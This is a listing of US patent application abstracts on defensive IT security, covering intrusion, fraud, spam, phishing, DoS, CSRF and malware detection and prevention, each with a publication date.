20120222112INFORMATION TECHNOLOGY GOVERNANCE AND CONTROLS METHODS AND APPARATUSES - Embodiments of the present invention provide methods and systems for automated change audit of an enterprise's IT infrastructure, including independent detection of changes, reconciliation of detected changes and independent reporting, to effectuate a triad of controls on managing changes within the IT infrastructure, preventive controls, detective controls and corrective controls.08-30-2012
20120222111CLASSIFYING A MESSAGE BASED ON FRAUD INDICATORS - Systems, methods, and media for classifying messages are disclosed. A plurality of fraud indicators are identified in the message. A signature of the message is generated. The generated signature of the message is compared to a stored signature. The stored signature is based on a statistical analysis of fraud indicators in a second message associated with the stored signature. A determination as to whether the message is fraudulent is made based on the comparison. The message is processed based on the determination that the message is a fraudulent message.08-30-2012
20120216278METHOD AND SYSTEM FOR REAL TIME CLASSIFICATION OF EVENTS IN COMPUTER INTEGRITY SYSTEM - Method and system using a designated known secure computer for real time classification of change events in a computer integrity system are disclosed. In the embodiment of the invention, the known secure computer, having only inbound connection, is dedicated for providing permissible change events, which are compared with change events generated on client operational computers. An alert is generated when the change event at the client operational computer and the respective permissible change event provided by the known secure computer mismatch.08-23-2012
20100050258LIGHTWEIGHT PACKET-DROP DETECTION FOR AD HOC NETWORKS - In packet-drop attacks in ad hoc networks, a malicious network node chooses to selectively drop packets that are supposed to be forwarded, which results in adverse impact on application good-put and network stability. A method and system for detection of packet-drop attacks in ad hoc networks requires network nodes to report statistics on IP flow packets originated, received, or forwarded to neighbors. These statistics are analyzed and correlated to determine nodes suspected of dropping packets.02-25-2010
20100050257CONFIRMATION METHOD OF API BY THE INFORMATION AT CALL-STACK - The present invention relates to a method of verifying an API using information recorded in the call stack. In the API verification method, whether at least one application is executed is determined in a system in which the application is installed. An API function requested when the application is executed is hooked. Details of a call stack for the API function are output. A stack Database (DB), in which call stack details for various types of API functions required for operation of the application are stored, is searched for the output call stack details, and the output call stack details are checked.02-25-2010
20080216173Method and Apparatus for Auditing Network Security - In an apparatus for auditing security of a computer systems at least one secure application server is in communication with a global computer network. The secure application server is programmed to receive selectively security audit instruction data from a remote computer system via the global computer network. A plurality of scanning machines each are in communication with the global computer network and are programmed to execute selectively a security audit scan of the remote computer system via the global computer network. A central computer, having a memory, is configured as a database server and as a scheduler. The central computer is in communication with the secure application server and the scanning machine. The central computer is programmed to perform the following operations: evaluate a database to determine if a security audit scan is currently scheduled to be run for a user; determine which of the plurality of scanning machines is available to perform a security audit scan; copy scan-related information into a scanning machine determined to be available and instruct the scanning machine to begin scan; and record the results of the scan in the memory.09-04-2008
20120180129SYSTEM AND METHOD FOR PREVENTING WEB FRAUDS COMMITTED USING CLIENT-SCRIPTING ATTACKS - A method for detecting and blocking Javascript hijacking attacks, comprising checking if an incoming request belongs to a valid session established between a client and a trusted server. When said incoming request does belong to a valid session, it is checked if a Referer header of said incoming request includes a valid domain name. The incoming request is marked as suspicious, when said incoming request does not include a valid domain name. It is checked if a respective response of said suspicious incoming request includes a script code. A preventive action responsive to a user input is taken when said respective response includes a script code.07-12-2012
20120180125METHOD AND SYSTEM FOR PREVENTING DOMAIN NAME SYSTEM CACHE POISONING ATTACKS - A method for preventing domain name system cache poisoning attacks comprises steps of inputting a domain name by an internet application program of an Internet communication device, determining in which area the Internet communication device is located, randomly selecting at least two domain name system resolvers of the area, retrieving at least one Internet protocol address from the domain name system resolvers and evaluating the Internet protocol addresses to generate at least one security score, selecting a trustworthy Internet protocol address based on the security scores, comparing the security score of the selected Internet protocol address with a predetermined security score threshold, and sending the trustworthy Internet protocol address to the Internet application program of the Internet communication device when the security score is greater than the security score threshold. A system for preventing domain name system cache poisoning attacks comprises an Internet communication device and an optional proxy server.07-12-2012
20120180124AUTHENTICATION RISK EVALUATION - A computer is configured to receive an authentication request that identifies one or more authentication form factors, and for each form factor identified, further identifies at least one parameter. The computer is further configured to generate a risk score for the authentication request using the parameter, the risk score being based at least in part on a complexity associated with each of the one or more authentication form factors. The computer is further configured to provide the risk score to a requester.07-12-2012
20130174254METHOD FOR ADMINISTERING A TOP-LEVEL DOMAIN - A method for administering a top-level domain by analyzing domain name registrations for requests for suspicious or malicious domain names. A request to register a domain name is received. The requested domain name's information may be stored in a registry database. The requested domain name may also be conditionally stored in the domain name system (DNS) zone. The requested domain name is compared to a list of botnet domain names stored in a watch list database. If the requested domain name corresponds to one of the botnet domain names, the requested domain name is prevented from being added to the DNS zone or is removed from the DNS zone, if it has already been stored there. The information regarding the requested domain name is stored in the registry database, even if the domain name does not ultimately stay in the DNS zone.07-04-2013
20130174253SYSTEMS AND METHODS FOR DETECTING SIMILARITIES IN NETWORK TRAFFIC - A system, computer-readable medium, and method for identifying similarities in network traffic are provided. Hash values are calculated from Internet Protocol (IP) addresses in a group of IP addresses that request a domain name, a hash signature is generated from the hash values and paired with the domain name, and the domain name is then clustered with another domain name having a paired hash of the same value. The clustered domain names are then extracted and used in a similarity calculation.07-04-2013
20130174255APPARATUS METHOD AND MEDIUM FOR TRACING THE ORIGIN OF NETWORK TRANSMISSIONS USING N-GRAM DISTRIBUTION OF DATA - A method, apparatus, and medium are provided for tracing the origin of network transmissions. Connection records are maintained at computer system for storing source and destination addresses. The connection records also maintain a statistical distribution of data corresponding to the data payload being transmitted. The statistical distribution can be compared to that of the connection records in order to identify the sender. The location of the sender can subsequently be determined from the source address stored in the connection record. The process can be repeated multiple times until the location of the original sender has been traced.07-04-2013
20120233692APPARATUS AND METHOD FOR DETECTING MALICIOUS SITES - The invention relates to an apparatus for detecting malicious sites, comprising: a monitoring unit for monitoring all processes being executed in a computing apparatus; a hook code insertion unit for inserting a hook code in a process executed in a browser when the execution of the browser is detected by the monitoring unit; a danger level determining unit that, upon the detection of a website movement, uses the hook code to inspect a stack structure of a process implemented according to the website movement and determine whether or not to perform the stack structure inspection, and determines whether or not the website to which the movement has been made is a malicious site; and a database for storing a list of sites determined to be malicious.09-13-2012
20100037315TAMPER-AWARE VIRTUAL TPM - Methods, software/firmware and apparatus for implementing a tamper-aware virtual trusted platform module (TPM). Under the method, respective threads comprising a virtual TPM thread and a security-patrol threads are executed on a host processor. In one embodiment, the host processor is a multi-threaded processor having multiple logical processors, and the respective threads are executed on different logical processors. While the virtual TPM thread is used to perform various TPM functions, the security-patrol thread monitors for physical attacks on the processor by implementing various numerical calculation loops, wherein an erroneous calculation is indicative of a physical attack. In response to detection of such an attack, various actions can be taken in view of one or more predefined security policies, such as logging the event, shutting down the platform and/or informing a remote management entity.02-11-2010
20090064324NON-INTRUSIVE MONITORING OF SERVICES IN A SERVICE-ORIENTED ARCHITECTURE - A method for monitoring a service provided in a service-oriented architecture may include submitting a subscription request to a plurality of intermediaries in the service-oriented architecture from which to receive monitored data related to the service and determining which ones of the plurality of intermediaries to rely upon for monitoring the service. The method may also include receiving the monitored data from the determined ones of the plurality of intermediaries and presenting the monitored data for monitoring the service.03-05-2009
20090064325PHISHING NOTIFICATION SERVICE - A method includes determining whether new phishing site identifiers (URLs and/or IP addresses) have been created. Upon a determination that the new phishing site identifiers have been created, the new phishing site identifiers are compared to site identifiers of sites to which critical values have been provided in the past. Upon a determination that at least one of the new phishing site identifiers matches at least one of the site identifiers, a phishing notification is provided that the user was successfully phished in the past.03-05-2009
20120185937SYSTEM AND METHOD FOR SELECTIVELY STORING WEB OBJECTS IN A CACHE MEMORY BASED ON POLICY DECISIONS - A system and method for selectively storing one or more web objects in a memory is disclosed. A server response is received at a network traffic management device, wherein the server response is associated with a client request sent from a client device and includes at least one web object. The server response is analyzed using a security module of the network traffic management device which determines if the at least a portion of the server response contains suspicious content in relation to one or more defined policy parameters handled by the security module. An instruction is sent from the security module to a cache module of the network traffic management device upon determining that the at least a portion of the server response contains suspicious information, wherein the cache module does not store the at least one web object upon receiving the instruction.07-19-2012
20120185936Systems and Methods for Detecting Fraud Associated with Systems Application Processing - Systems and methods for detecting fraud associated with systems application processing are provided. An example method may include: for each of at least a subset of multiple application services, receiving an audit log message indicating a respective point in an execution path associated with execution of the application services; and prior to executing an application service endpoint of the application services, analyzing the received audit log messages to determine whether the execution path satisfies at least one predefined expected execution path.07-19-2012
20120084858SYSTEM AND METHOD FOR DETECTION OF ABERRANT NETWORK BEHAVIOR BY CLIENTS OF A NETWORK ACCESS GATEWAY - Embodiments of systems and methods for detecting aberrant network behavior are disclosed. One embodiment comprises a network interface over which network communications are received from a client. These network communications can then be analyzed to determine if aberrant network behavior is occurring with respect to the client.04-05-2012
20120084857DEVICE SECURITY SYSTEM - A computer-implemented method may include identifying a security event condition associated with a device. One or more security rules may be identified for execution based on the device and the identified security event condition, wherein the one or more security rules define security related actions to be performed upon occurrence of the security event condition. The security related actions may be initiated by at least one processor on the device to secure the device from unauthorized use.04-05-2012
20120185935IMPLEMENTING AUTOMATIC ACCESS CONTROL LIST VALIDATION USING AUTOMATIC CATEGORIZATION OF UNSTRUCTURED TEXT - A method, system and computer program product are provided for implementing automatic access control list validation using automatic categorization of unstructured text. Automatic categorization of unstructured text is performed on a plurality of documents of an access control list for determining an average term vector. Each of the documents is scored against the average term vector to identify a dissimilar document, flagged as a possible security risk. Automatic categorization of unstructured text is performed on user information of a plurality of members of a candidate access control list for determining a typical term vector. A similarity score is determined by user information and the typical term vector, members of an access control list that are dissimilar from other members of the access control list are identified.07-19-2012
20120227106SYSTEM AND METHOD FOR PREVENTING WEB FRAUDS COMMITTED USING CLIENT-SCRIPTING ATTACKS - A method for detecting and blocking Javascript hijacking attacks, comprising checking if an incoming request belongs to a valid session established between a client and a trusted server. When said incoming request does belong to a valid session, it is checked if a Referer header of said incoming request includes a valid domain name. The incoming request is marked as suspicious, when said incoming request does not include a valid domain name. It is checked if a respective response of said suspicious incoming request includes a script code. A preventive action responsive to a user input is taken when said respective response includes a script code.09-06-2012
20120227105METHOD AND APPARATUS FOR DETECTING MALICIOUS SOFTWARE USING MACHINE LEARNING TECHNIQUES - Novel methods, components, and systems for detecting malicious software in a proactive manner are presented. More specifically, we describe methods, components, and systems that leverage machine learning techniques to detect malicious software. The disclosed invention provides a significant improvement with regard to detection capabilities compared to previous approaches.09-06-2012
20120227104SYSTEMS AND METHODS FOR DETECTING EMAIL SPAM AND VARIANTS THEREOF - The present disclosure provides systems and methods for detecting email spam and variants thereof. The systems and methods are configured to detect spam messages and variations thereof for different senders and with slight differences within the message body. In an exemplary embodiment, an incoming message body (m) is converted to a sequence of successive word lengths (S09-06-2012
20120260336NETWORK ACCOUNTABILITY AMONG AUTONOMOUS SYSTEMS - In one kind of DoS attack, malicious customers may try to send a large number of filter requests against an innocent customer. In one implementation, a Filter Request Server (FRS) may allow a customer against who a filter request is made to dispute the implicit accusation of the filter request or stop sending malicious traffic. If the customer claims innocence, the FRS may log destination addresses of data packets sent by the customer and identify and ignore false filter requests if these filter requests come from customers who do not correspond to one or more of the destination addresses that have previously been logged by the FRS.10-11-2012
20120260335FRONT-END PROTOCOL FOR SERVER PROTECTION - The present invention provides for protecting against denial of service attacks. A request is sent by a client, the request comprises client indicia. The request is received at a server. A request count is incremented by the server. A sequence number is assigned as a function of the client indicia. A problem is selected by the server. The problem is sent by the server to the client. A solution to the problem is sent to the server. It is determined if the solution by client is correct. If the solution is correct, a session is performed. If the solution is not correct, the request is discarded. This can substantially decrease the amount of attacks performed by a rogue client, as the session set-up time can be substantial.10-11-2012
20120260337System and Method for Avoiding and Mitigating a DDoS Attack - Described is a system and method for receiving a data packet including a destination address and a source address, categorizing the data packet into a community based on the source address, wherein the community is predefined by a user corresponding to the destination address and selecting a treatment for the data packet based on the community. The method may be implemented on a router to avoid and/or mitigate the harmful effects of a Distributed Denial of Service (“DDoS”) attack on a computer system or network.10-11-2012
20090019544Ensuring Security of Connection Between Thin Client and Client Blade - A method and system for ensuring security and preventing intrusion in a connection between a thin client and a client blade. An encrypted keep-alive protocol is conducted between the client blade and the thin client. The client blade issues keep-alive protocol messages and monitors for keep-alive protocol acknowledgments from the thin client. If a failure in receiving a keep-alive protocol acknowledgment from the thin client is detected and the failure is not due to a momentary glitch in the keep-alive protocol, then a command is generated to enter the client blade in a particular state (e.g., a hard power off state). The command is based on a “privilege mask” which includes code that specifies an action to be performed (i.e., enter a particular state) by the client blade. Based on the action performed by the client blade, the client blade provides different levels of security or protection against intrusion.01-15-2009
20080301807System and Method for Controlling On-Demand Security - An on-demand security service ensures isolation of the service provider's customers where the customers share resources at the system, subsystem, and storage level. The security service is provided in a pre-production phase and in a post production phase. The pre-production phase takes place prior to boarding the customer. In the pre-production phase the resources to be protected are defined in a security guide, and using the security guide, physical segregation at the facility, network, and technical and delivery support levels is planned and then implemented. In the post production phase, on going activities are proactive and reactive. Proactive activities include maintaining physical segregation by reviewing and updating the security guide, and testing physical segregation by performing security audits and penetration tests. Observations and finding of the audits and penetration tests are resolved. Reactive activities include identifying isolation failures, coordinating appropriate actions, and resolving the isolation failure. The service may be embodied in a system and in a computer implemented process comprising a security guide file (SGF), a security guide application (SGA), a security implementation application (SIA), a security validation application (SVA), and an event coordination application (ECA).12-04-2008
20080301806DISTRIBUTED COMPUTATION IN UNTRUSTED COMPUTING ENVIRONMENTS USING DISTRACTIVE COMPUTATIONAL UNITS - An apparatus, program product and method initiate the execution of distractive computational units along with the execution of other computational units on an untrusted computer to inhibit the reconstitution of a computation by an untrusted party. In particular, along with partitioning a particular computation into a plurality of computational units, one or more distractive computational units are generated and supplied to one or more resource providers for execution along with those of the partitioned computation.12-04-2008
20120266241Communications system having security apparatus, security apparatus and method herefor - The present invention relates to a communications system having at least one communications means by means of which the communications system can be connected to at least one further processing unit and/or to a further communications system, having at least one first memory means, having at least one second memory means and having at least one security apparatus, wherein identical information is stored on the first and second memory means and wherein damage to the communications system can be determined with reference to a comparison of this information by means of the security apparatus. The present invention furthermore relates to a security apparatus and to a method of determining damage to a communications system.10-18-2012
20120266240Method and apparatus for filtering malicious call completion indicator and calling-side network device - A method for filtering a malicious call completion indicator in a CCBS service is provided, in which a calling-side network device rejects the current call request or removes the call completion indicator information from the call request and then forwards the call request, when determining the call request carries the information. The disclosure also provides a corresponding apparatus, which includes a reception unit configured to receive a call request, a detection unit configured to detect the call request and to trigger the rejection unit when determining that the call request carries call completion indicator information and a rejection unit configured to reject the current call request. A calling-side network device is also provided. According to the disclosure, the sequence for accessing the calls from calling subscribers to a called subscriber is well kept, thus assuring fairness of the call access and avoiding preferential call access of malicious subscribers.10-18-2012
20120240227METHODS AND APPARATUS FOR CONDUCTING ELECTRONIC TRANSACTIONS - A system and method for conducting electronic commerce are disclosed. In various embodiments, the electronic transaction is a purchase transaction. A user is provided with an intelligent token, such as a smartcard containing a digital certificate. The intelligent token suitably authenticates with a server on a network that conducts all or portions of the transaction on behalf of the user. In various embodiments a wallet server interacts with a security server to provide enhanced reliability and confidence in the transaction. In various embodiments, the wallet server includes a toolbar. In various embodiments, the digital wallet pre-fills forms. Forms may be pre-filled using an auto-remember component.09-20-2012
20110047617PROTECTING AGAINST NETWORK RESOURCES ASSOCIATED WITH UNDESIRABLE ACTIVITIES - Various embodiments provide protection against web resources associated with one or more undesirable activities. In at least some embodiments, a method detects and responds to a user-initiated activity on a computing device. Responding can include, by way of example and not limitation, checking locally, on the computing device, whether a web resource that is associated with the user-initiated activity has been identified as being associated with a safe site. Furthermore, in at least some embodiments, the method checks remotely, away from the computing device, whether the web resource is identified as being at least possibly associated with one or more undesirable activities.02-24-2011
20120324573METHOD FOR DETERMINING WHETHER OR NOT SPECIFIC NETWORK SESSION IS UNDER DENIAL-OF-SERVICE ATTACK AND METHOD FOR THE SAME - Provided is an apparatus and method for determining whether or not a specific network session is under a denial-of-service (DoS) attack. The method includes detecting a packet transmitted in the session, initializing the number of attack-suspicion continuation packets, increasing the number of attack-suspicion continuation packets by a predetermined number, and determining that the session is under the DoS attack.12-20-2012
20120324572SYSTEMS AND METHODS THAT PERFORM APPLICATION REQUEST THROTTLING IN A DISTRIBUTED COMPUTING ENVIRONMENT - Methods of managing network traffic in a distributed computing environment include segmenting a plurality of virtual hosts into sub-groups. A first security agent monitors first communications of virtual hosts within a first sub-group of virtual hosts, and a second security agent monitors second communications of virtual hosts within a second sub-group of virtual hosts. Information regarding the first communications and the second communications is collected from the security agents and analyzed to detect a denial of service attack. A defense mechanism is initiated in response to detecting the denial of service attack.12-20-2012
20120324574ENGINE, SYSTEM AND METHOD OF PROVIDING A DOMAIN SOCIAL NETWORK HAVING BUSINESS INTELLIGENCE LOGIC - An engine, system and method for a domain social network that interconnects Internet users with at least domains owned by or of interest to those Internet users, and that may obtain and/or forward obtained dynamic data regarding those domains automatically, such as by web service or email service. The dynamic data may be used to filter and protect content and data of the respective domains, to protect users by identifying low quality web pages or malicious software or pages, to isolate or improve search results regarding the domain, and/or to improve Internet-based transaction flow, such as the creation of advertising.12-20-2012
20110225652IDENTITY THEFT COUNTERMEASURES - In some embodiments, techniques for computer security comprise preventing and/or mitigating identity theft such as phishing.09-15-2011
20110239296TRACING UNAUTHORIZED USE OF SECURE MODULES - At least methods and systems for generating tracing data for tracing rogue secure modules in a population of secure modules are described wherein said rogue secure modules are configured for unauthorized provisioning of control words to a control word sharing network. One method comprises: executing a predetermined number of tracing experiments on said population, wherein each of said tracing experiments comprises: sending at least one tracing event message to each secure module in said selected population, wherein event information in said tracing event message is used to select at least part of said secure modules in said population to generate a tracing event; in response to the reception of said at least one tracing event message, a tracing event detector monitoring for a predetermined time the presence of at least one tracing event in said control word sharing network; and, storing tracing data in an event database, said tracing data comprising said event information and event detection information indicating whether or not a tracing event is detected.09-29-2011
20110239295METHOD FOR SUPPORTING ATTACK DETECTION IN A DISTRIBUTED SYSTEM - A method for supporting attack detection in a distributed system, wherein a message being sent within the distributed system from a source entity to one or more target entities is transmitted via one or more intermediate entities, and wherein at least one of the one or more intermediate entities—tagging entity—appends an attack information tag to the message indicating whether the message constitutes or is part of an attack, is characterized in that a reputation system is provided, the reputation system being configured to receive the attack information tag generated by the tagging entity, and to generate a rating of the attack information tag.09-29-2011
20120278884METHOD AND SYSTEM FOR PROCESSING A FILE TO IDENTIFY UNEXPECTED FILE TYPES - A method and system for testing a file (or packet) formed from a sequential series of information units, each information unit within a predetermined set of information units, e.g., each information unit may correspond to a character within the ASCII character set. An information unit-pair entropy density measurement is calculated for the received file using a probability matrix. The probability matrix tabulates the probabilities of occurrence for each possible sequential pair of information units of the predetermined set of information units. The computed information unit-pair entropy density measurement is compared with a threshold associated with an expected file type to determine whether the received file is of the expected file type or of an unexpected file type. The probability matrix may optionally be generated from the received file prior to calculating the density thereof. The probability matrix may optionally be predetermined based on the expected file type.11-01-2012
20120090027APPARATUS AND METHOD FOR DETECTING ABNORMAL HOST BASED ON SESSION MONITORING - An apparatus for detecting an abnormal host based on session monitoring includes: a host information collection unit for collecting information of processes being executed in hosts and information of sessions connected by the hosts; a network traffic monitoring unit for collecting network traffic information; an analysis unit for calculating an entropy of each host based on the collected session information to analyze correlation between hosts based on the calculated entropy and the network traffic information; and a detection unit for detecting an abnormal host and a process causing harmful traffic in the abnormal host based on the correlation and updating a black list based on the detected host and process.04-12-2012
20120090026CROSS-SITE SCRIPTING PREVENTION IN DYNAMIC CONTENT - Embodiment relate to systems, methods, and computer storage media for suppressing cross-site scripting in a content delivery system. A request is received for content that includes a scripted item or scripted items. The scripted item is identified within the content. An identifier is associated with the scripted element when the scripted element is an intended scripted element to be associated with the content. The identifier may be a hash value based from a hash function and the scripted item. Prior to communicating the content to a user, the scripted item is identified again to determine if an identifier is associated with the scripted item. If an identifier is associated with the scripted item, the identifier is evaluated to determine if the identifier is appropriate. When the identifier is determined to not be appropriate, the scripted item is prevented from being communicated to a user.04-12-2012
20120090025SYSTEMS AND METHODS FOR DETECTION OF MALICIOUS SOFTWARE PACKAGES - A software repository offering a software package or a computing system downloading a software package can utilize a security tool to verify the security of the software package. The security tool can check and verify that the software package is secure utilizing a black list of components. To check the security, the security tool can compare the components (archival files) of the software package to the the black list. A black list can include a list of components that are known to be insecure.04-12-2012
20120331552MALWARE AUTOMATED REMOVAL SYSTEM AND METHOD - The present invention automates the operation of multiple malware removal software products using a computerized system that systematically operates the multiple selected software products. These products are operated them in a customized “Safe Mode” using a shell that is different than the computer's other shell environments. Unlike the ordinary Safe Modes shells, the Custom Safe Mode prevents malware from functioning that ties itself to the normal shell, such as the Windows Explorer shell. In addition, the Custom Safe Mode allows the automation of tasks beyond that which is available under the standard command line shell.12-27-2012
20120331551Detecting Phishing Attempt from Packets Marked by Network Nodes - A service is provided to an end-user of a first data communication device when receiving via a data network a plurality of data packets from a second data communication device. At least a particular data packet has been marked with node attribute data by one or more network nodes. The attribute data is indicative of a path of the data packet across the data network. An identifier, as declared by the second device is determined and correlated with one or more reference identifiers registered in advance. If there is a correlation, the node attribute data is correlated with reference attribute data registered in advance as associated with the reference identifier. If there is a discrepancy between the node attribute data and the reference attribute data, an alert is issued.12-27-2012
20120331550TRUSTED LANGUAGE RUNTIME ON A MOBILE PLATFORM - Disclosed is a trusted language runtime (TLR) architecture that provides abstractions for developing a runtime for executing trusted applications or portions thereof securely on a mobile device (e.g., a smartphone). TLR offers at least two abstractions to mobile developers: a trustbox and a trustlet. The trustbox is a runtime environment that offers code and data integrity, and confidentiality. Code and data running inside a trustbox cannot be read or modified by any code running outside the trustbox. A trustlet is the code portion of an application that runs inside a trustbox. With TLR, programmers can write applications in .NET and specify which parts of the application handle sensitive data, and thus, run inside the trustbox. With the TLR, the developer places these parts in a trustlet class, and the TLR provides all support needed to run the parts in the trustbox.12-27-2012
20100229237Dual Use Counters for Routing Loops and Spam Detection - A method for detecting an undesirable condition within a messaging network. A message is received and a source of the message is identified. If an entry in a database for the source has not been created, an entry is created. A source counter for the source is then set to one and a timestamp is created for the source. If an entry in the database for the source has been previously created, the source counter is incremented by one and the timestamp is updated. The source counter is then compared to a source threshold, and if the source counter exceeds the source threshold over the course of predetermined amount of time, a source alarm is triggered. A sliding with respect to the predetermined amount of time may also be implemented to account for total counts that may fall across or be split by set periods of time. The invention is particularly useful for detecting “spam” events and undesirable routing loops.09-09-2010
20100229236METHOD AND SYSTEM FOR SPAM REPORTING WITH A MESSAGE PORTION - Methods and systems for spam reporting with a message portion are described. In one embodiment, an electronic message is received on a mobile electronic device. A spam report policy is used on the mobile electronic device to identify a portion of the electronic message to include with a spam report. The spam report is transmitted from the mobile electronic device to a server, the spam report notifying the server that the electronic message is spam and including the portion of the electronic message without including a copy of the entire electronic message.09-09-2010
20100229235REGION ACCESS AUTHORIZATION IN A VIRTUAL ENVIRONMENT - The passage of avatars into and out of regions in a virtual universe is regulated through the use of secure communications between and among the avatar, an authority managing of the region and a trusted third party who maintains a database of avatar characteristics. Permission to move from one virtual region to another is determined based upon the avatar characteristics.09-09-2010
20120137361NETWORK SECURITY CONTROL SYSTEM AND METHOD, AND SECURITY EVENT PROCESSING APPARATUS AND VISUALIZATION PROCESSING APPARATUS FOR NETWORK SECURITY CONTROL - A network security control system includes: a network event generator for generating network events; a security event processing apparatus for collecting the network events from the network event generator via a network and processing the collected network events as a target data for visualization; and a visualization processing apparatus for visualizing the target data to display a security status as a third-dimensional (3D) visualization information on an organization basis.05-31-2012
20100192223Detecting Malicious Network Content Using Virtual Environment Components - Malicious network content is identified based on the behavior of one or more virtual environment components which process network content in a virtual environment. Network content can be monitored and analyzed using a set of heuristics. The heuristics identify suspicious network content communicated over a network. The suspicious network content can further be analyzed in a virtual environment that includes one or more virtual environment components. Each virtual environment component is configured to mimic live environment components, for example a browser application component or an operating system component. The suspicious network content is replayed in the virtual environment using one or more of the virtual environment components. The virtual environment component behavior is analyzed in view of an expected behavior to identify malicious network content. The malicious network content is then identified and processed.07-29-2010
20100192222MALWARE DETECTION USING MULTIPLE CLASSIFIERS - A method of identifying a malware file using multiple classifiers is disclosed. The method includes receiving a file at a client computer. The file includes static metadata. A set of metadata classifier weights are applied to the static metadata to generate a first classifier output. A dynamic classifier is initiated to evaluate the file and to generate a second classifier output. The method includes automatically identifying the file as potential malware based on at least the first classifier output and the second classifier output.07-29-2010
20130014255System and Method for Providing Network Security - A method includes receiving an indication of at least one detected security issue at a network device. The indication is received at a security manager processor from a security agent. The method includes selecting, via the security manager processor, at least one executable security object responsive to the indication. The security manager processor verifies compatibility between the at least one executable security object, the network device, and communication media. The method also includes sending the at least one executable security object to the network device via the security manager processor to provide a protective security measure to the network device against the at least one detected security issue upon execution of the at least one executable security object.01-10-2013
20130014254RESPONDING TO A MAINTENANCE FREE STORAGE CONTAINER SECURITY THREAT - A method for responding to a security threat for a maintenance free storage container begins by a dispersed storage (DS) processing module identifying a security threat for the maintenance free storage container, wherein the maintenance free storage container allows for multiple storage servers of a plurality of storage servers to be in a failure mode without replacement. The method continues with the DS processing module determining a failure mode level that is indicative of whether one or more of the multiple storage servers are in the failure mode. The method continues with the DS processing module selecting a security threat countermeasure based on the security threat and the failure mode level. The method continues with the DS processing module implementing the security threat countermeasure.01-10-2013
20130014253Network Protection Service - A network protection method is provided. The network protection method may include receiving a Domain Name System (DNS) request, logging the DNS request, classifying the DNS request based on an analysis of a DNS name associated with the DNS request, taking a security action based on the classification, analyzing network traffic after taking the security action, and providing substantially real-time feedback associated with the network traffic to improve future DNS request classifications. The method may further include receiving a DNS response and logging the DNS response. The analysis of the DNS name may include receiving DNS data related to the DNS name from a plurality of sources, receiving reputation data related to the plurality of sources, scoring each of the plurality of sources based on the reputation data, and aggregating the DNS data related to the DNS name based on the scoring.01-10-2013
20100132036VERIFICATION OF OUTSOURCED DATA STREAMS - Embodiments disclosed herein are directed to verifying query results of an untrusted server. A data owner outsources a data stream to the untrusted server, which is configured to respond to a query from a client with the query result, which is returned to the client. The data owner can maintain a vector associated with query results returned by the server and can generate a verification synopsis using the vector and a seed. The verification synopsis includes a polynomial, where coefficients of the polynomial are determined based on the seed. The data owner outputs the verification synopsis and the seed to a client for verification of the query results.05-27-2010
20120151580COMPUTING SYSTEM - Disclosed is a computing system which comprises a data processing device exchanging communication data with the external and processing the communication data; and a security integrated circuit (IC) monitoring the communication data.06-14-2012
20130019308Method and Device for Preventing CSRF Attack - The disclosure provides method for preventing CSRF attacks, in which the method provides: intercepting request sent from a client browser to a server; generating a token; generating a response to the request; inserting the token into the response to the request; and sending the response to the request to the client browser with the token inserted into the response. With the method of the disclosure, it is assured that a token is inserted into all the requests made by a user through a client browser for accessing a resource. And it can be assured that the request is issued by the user himself by verifying whether the token in the request is valid, thereby preventing a CSRF attack.01-17-2013
20130019307Secure Computer Architecture - A secure computer architecture is provided. With this architecture, data is received, in a component of an integrated circuit chip implementing the secure computer architecture, for transmission across a data communication link. The data is converted, by the component, to one or more first fixed length frames. The one or more first fixed length frames are then transmitted, by the component, on the data communication link in a continuous stream of frames. The continuous stream of frames includes one or more second fixed length frames generated when no data is available for inclusion in the frames of the continuous stream.01-17-2013
20130019306Remote-Assisted Malware DetectionAANM Lagar-Cavilla; Horacio AndresAACI Morris PlainsAAST NJAACO USAAGP Lagar-Cavilla; Horacio Andres Morris Plains NJ USAANM Varshavsky; AlexanderAACI East HanoverAAST NJAACO USAAGP Varshavsky; Alexander East Hanover NJ US - Remote assistance is provided to a mobile device across a network to enable malware detection. The mobile device transmits potentially infected memory pages to a remote server across a network. The remote server performs analysis, and provides feedback to the mobile device. Based on the received feedback, the mobile device halts a process, or retrieves and transmits additional memory pages to the remote server for more analysis. This process is repeated until a compromised region of memory is identified and/or isolated for further repair to be performed. The feedback from the remote server reduces the processing and storage burden on the mobile device, resulting in a more reliable detection that uses fewer resources. Embodiments including hypervisors and virtual machines are disclosed.01-17-2013
20110162069SUSPICIOUS NODE DETECTION AND RECOVERY IN MAPREDUCE COMPUTING - Embodiments of the present invention address deficiencies of the art in respect to distributed computing for large data sets on clusters of computers and provide a novel and non-obvious method, system and computer program product for detecting and correcting malicious nodes in a cloud computing environment (e.g., MapReduce computing). In one embodiment of the invention, a computer-implemented method for detecting and correcting malicious nodes in a cloud computing environment can include selecting a task to dispatch to a first worker node, setting a suspicion index threshold for the selected task, determining a suspicion index for the selected task, comparing the suspicion index to the suspicion index threshold and receiving a result from a first worker node. The method further can include applying a recovery action when the suspicion index exceeds the selected suspicion index threshold.06-30-2011
20130024934CLASSIFICATION OF SOFTWARE ON NETWORKED SYSTEMS - A method and system for the classification of software in networked systems, includes: determining a software received by a sensor is attempting to execute on a computer system of the sensor; classifying the software as authorized or unauthorized to execute, and gathering information on the software by the sensor if the software is classified as unauthorized to execute. The sensor sends the information on the software to one or more actuators, which determine whether or not to act on one or more targets based on the information. If so, then the actuator sends a directive to the target(s). The target(s) updates its responses according to the directive. The classification of the software is definitive and is not based on heuristics or rules or policies and without any need to rely on any a priori information about the software.01-24-2013
20130024933AUDITING A DEVICE - The auditing of a device that includes a physical memory is disclosed. One or more hardware parameters that correspond to a hardware configuration is received. Initialization information is also received. The physical memory is selectively written in accordance with a function. The physical memory is selectively read and at least one result is determined. The result is provided to a verifier.01-24-2013
20130024935SYSTEM, METHOD, AND COMPUTER PROGRAM PRODUCT FOR CONDITIONALLY PERFORMING A SCAN ON DATA BASED ON AN ASSOCIATED DATA STRUCTURE - A system, method, and computer program product are provided for conditionally performing a scan of data based on an associated data structure. In use, at least one aspect is identified for each of a first plurality of scanners utilized to perform a scan on data at a first network device. Additionally, at least one data structure is associated with the data, where the at least one data structure reflects the at least one aspect of each of the first plurality of scanners. Furthermore, a subsequent scan on the data is conditionally performed utilizing each of a second plurality of scanners at a second network device, based on the at least one data structure.01-24-2013
